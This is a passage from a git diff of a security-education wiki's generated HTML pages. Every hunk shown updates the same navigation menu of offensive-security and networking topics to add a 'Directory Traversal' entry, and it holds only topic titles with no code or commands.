          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

User ID

- - diff --git a/docs/System Internals/Linux/index.html b/docs/System Internals/Linux/index.html index aa53b82b..e6e23edd 100644 --- a/docs/System Internals/Linux/index.html +++ b/docs/System Internals/Linux/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -174,22 +174,6 @@

The Cyberclopaedia

- - diff --git a/docs/System Internals/Windows/Active Directory (AD)/Computers.html b/docs/System Internals/Windows/Active Directory (AD)/Computers.html index d52dd283..f535b7dd 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/Computers.html +++ b/docs/System Internals/Windows/Active Directory (AD)/Computers.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -176,22 +176,6 @@

Introduction - - diff --git a/docs/System Internals/Windows/Active Directory (AD)/Contacts.html b/docs/System Internals/Windows/Active Directory (AD)/Contacts.html index 7180c918..717b2a95 100644 --- a/docs/System Internals/Windows/Active Directory (AD)/Contacts.html +++ b/docs/System Internals/Windows/Active Directory (AD)/Contacts.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
